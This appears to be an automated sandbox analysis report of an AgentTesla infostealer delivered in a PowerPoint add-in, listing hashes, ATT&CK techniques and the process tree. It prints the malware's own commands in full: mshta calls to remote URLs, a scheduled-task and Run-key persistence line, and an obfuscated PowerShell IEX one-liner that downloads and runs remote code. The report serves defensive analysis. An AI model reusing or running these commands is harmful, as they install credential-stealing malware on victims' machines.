agenttesla | 33f4029423a3f52c376e6335e41d1ac4fccc9eff56aa29942cda968def3834c4

General

Target

M0120211002081457786750.ppam
Size

11KB
MD5

6dcc9d21ef2edc9fd781ff822bd084d9
SHA1

6f06878c124458c4c470c271f403a996cc695bf1
SHA256

33f4029423a3f52c376e6335e41d1ac4fccc9eff56aa29942cda968def3834c4
SHA512

61a30c98be6af40ce7cc606ce0a864a1e3fece6cdd10f25af6e2bceebd3b240f4b73d22e9e9b0d27d1872747831ebeca97aa0dd1c4ffa3f9181ed0fdceb2c615

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1944	2472	mshta.exe	POWERPNT.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2508-331-0x000000000043752E-mapping.dmp	family_agenttesla
behavioral2/memory/2196-398-0x000000000043752E-mapping.dmp	family_agenttesla
behavioral2/memory/2196-404-0x0000000005700000-0x0000000005BFE000-memory.dmp	family_agenttesla

Blocklisted process makes network request 13 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
41	1944	mshta.exe
43	1944	mshta.exe
45	1944	mshta.exe
47	1944	mshta.exe
49	1944	mshta.exe
50	1944	mshta.exe
52	1944	mshta.exe
54	1944	mshta.exe
55	1944	mshta.exe
57	1944	mshta.exe
60	1944	mshta.exe
61	1944	mshta.exe
63	568	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

jsc.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/9.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/9.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/9.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_9ced8c4882bf438794323650cefdf10a.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d3e937b03944ed6970ddcdfb041998e.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 568 set thread context of 2508	568	powershell.exe	jsc.exe
PID 568 set thread context of 2196	568	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1364 schtasks.exe

pid	process
1364	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3096 taskkill.exe
1260 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2472 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid process

1424 dw20.exe
1424 dw20.exe
568 powershell.exe
568 powershell.exe
568 powershell.exe
2508 jsc.exe
2508 jsc.exe
2196 RegAsm.exe
2196 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

2196 RegAsm.exe

pid	process
3096	taskkill.exe
1260	taskkill.exe

pid	process
2472	POWERPNT.EXE

pid	process
1424	dw20.exe
1424	dw20.exe
568	powershell.exe
568	powershell.exe
568	powershell.exe
2508	jsc.exe
2508	jsc.exe
2196	RegAsm.exe
2196	RegAsm.exe

pid	process
2196	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	3096	taskkill.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	2508	jsc.exe
Token: SeDebugPrivilege	2196	RegAsm.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

2472 POWERPNT.EXE
2508 jsc.exe
2196 RegAsm.exe

pid	process
2472	POWERPNT.EXE
2508	jsc.exe
2196	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 2472 wrote to memory of 1944	2472	POWERPNT.EXE	mshta.exe
PID 2472 wrote to memory of 1944	2472	POWERPNT.EXE	mshta.exe
PID 1944 wrote to memory of 1260	1944	mshta.exe	taskkill.exe
PID 1944 wrote to memory of 1260	1944	mshta.exe	taskkill.exe
PID 1944 wrote to memory of 3096	1944	mshta.exe	taskkill.exe
PID 1944 wrote to memory of 3096	1944	mshta.exe	taskkill.exe
PID 1944 wrote to memory of 568	1944	mshta.exe	powershell.exe
PID 1944 wrote to memory of 568	1944	mshta.exe	powershell.exe
PID 1944 wrote to memory of 1364	1944	mshta.exe	schtasks.exe
PID 1944 wrote to memory of 1364	1944	mshta.exe	schtasks.exe
PID 1944 wrote to memory of 1424	1944	mshta.exe	dw20.exe
PID 1944 wrote to memory of 1424	1944	mshta.exe	dw20.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 2508	568	powershell.exe	jsc.exe
PID 568 wrote to memory of 1876	568	powershell.exe	csc.exe
PID 568 wrote to memory of 1876	568	powershell.exe	csc.exe
PID 1876 wrote to memory of 2472	1876	csc.exe	cvtres.exe
PID 1876 wrote to memory of 2472	1876	csc.exe	cvtres.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe
PID 568 wrote to memory of 2196	568	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\M0120211002081457786750.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksoodwdasdwmdaweu
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/9.html\""
3⤵
- Creates scheduled task(s)
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_9ced8c4882bf438794323650cefdf10a.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d3e937b03944ed6970ddcdfb041998e.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2508

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzdukger\zzdukger.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D43.tmp" "c:\Users\Admin\AppData\Local\Temp\zzdukger\CSCAB4B0787B16A470BA4B6D54044CF4285.TMP"
5⤵
PID:2472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:2196

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2980
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1424

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES3D43.tmp

MD5
bcaca9e5a8748f0773cdb0bf1b13a746

SHA1
939482296c7fb48750089dbfbc7beb6ab6393125

SHA256
462dd360f9e62506c20405436cb37ce4748a2df0c7b035237f3cc6727fcdeb1e

SHA512
bc323196abbd1dfd3cf95098c6d5e08865464e48f116fedf1cbd6aee47ab401828a6a2770dcf760b5b558720892579a2e189a12d96f193d5f63796afca263002

Download Submit
C:\Users\Admin\AppData\Local\Temp\zzdukger\zzdukger.dll

MD5
e4ada96b69b7961c6f8c6eeba5cd1ea6

SHA1
7d1e2791b68c16fd92b331605c4fbf8b7d5c2fc5

SHA256
e5e417f9599de88da2e4aa274f6ab39eb661f9ff01f68805cb7d56f8523a23d1

SHA512
46635b580efe714f84222c2dbd48516e4d7ec2906ea88138e113c3429ecb95f9b8bd24d201339965b3caa218f0f17f468f3b14838b3d4245d9d0c751d3723f28

Download Submit
C:\Windows\system32\drivers\etc\hosts

MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zzdukger\CSCAB4B0787B16A470BA4B6D54044CF4285.TMP

MD5
0d9b2e1a652efe65d397d4ce054730ee

SHA1
6f4466d464a97caa600addd8b62f95dccedcf15b

SHA256
6676cb4fd7135e5f3641753e50c13d1d07722931e0ca1eefa2bb741f3349bd23

SHA512
3d3bd768c35a851e5a520fc3e1e562d5e6585c4535e9c8e534dc339786b3ab8d515eeb906eecc4e6cecd043c4edd0fe1bf955d9305513dea11312f71c2a3ca24

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zzdukger\zzdukger.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zzdukger\zzdukger.cmdline

MD5
1b7bec0c803dd759d2672ca19a3bb4f8

SHA1
383afe75356d04b79dc90d5e80cb005fa6064f4a

SHA256
4bbc906b70cc31c065f62ee1872eef1ed85ce3814c60b33ef4e4d2baed731f91

SHA512
3319f9855477a64cea1ef59067683b61144f64ad84036000220710ea2da87eca083fbae844f13ec76b503b078a97de7e3eee790142bda712d64afb6b1088301b

Download Submit
memory/568-319-0x000001B2ED550000-0x000001B2ED552000-memory.dmp

Filesize
8KB

Download
memory/568-320-0x000001B2ED553000-0x000001B2ED555000-memory.dmp

Filesize
8KB

Download
memory/568-304-0x0000000000000000-mapping.dmp

Download
memory/568-328-0x000001B2ED556000-0x000001B2ED558000-memory.dmp

Filesize
8KB

Download
memory/1260-302-0x0000000000000000-mapping.dmp

Download
memory/1364-305-0x0000000000000000-mapping.dmp

Download
memory/1424-306-0x0000000000000000-mapping.dmp

Download
memory/1876-389-0x0000000000000000-mapping.dmp

Download
memory/1944-268-0x0000000000000000-mapping.dmp

Download
memory/2196-398-0x000000000043752E-mapping.dmp

Download
memory/2196-404-0x0000000005700000-0x0000000005BFE000-memory.dmp

Filesize
5.0MB

Download
memory/2196-415-0x0000000005700000-0x0000000005BFE000-memory.dmp

Filesize
5.0MB

Download
memory/2472-128-0x00007FF81E1A0000-0x00007FF81E1B0000-memory.dmp

Filesize
64KB

Download
memory/2472-122-0x00000257ABF90000-0x00000257ABF92000-memory.dmp

Filesize
8KB

Download
memory/2472-116-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmp

Filesize
64KB

Download
memory/2472-117-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmp

Filesize
64KB

Download
memory/2472-129-0x00007FF81E1A0000-0x00007FF81E1B0000-memory.dmp

Filesize
64KB

Download
memory/2472-115-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmp

Filesize
64KB

Download
memory/2472-392-0x0000000000000000-mapping.dmp

Download
memory/2472-118-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmp

Filesize
64KB

Download
memory/2472-121-0x00000257ABF90000-0x00000257ABF92000-memory.dmp

Filesize
8KB

Download
memory/2472-120-0x00000257ABF90000-0x00000257ABF92000-memory.dmp

Filesize
8KB

Download
memory/2472-119-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmp

Filesize
64KB

Download
memory/2508-331-0x000000000043752E-mapping.dmp

Download
memory/2508-414-0x0000000005110000-0x000000000560E000-memory.dmp

Filesize
5.0MB

Download
memory/2508-388-0x0000000005110000-0x000000000560E000-memory.dmp

Filesize
5.0MB

Download
memory/3096-303-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads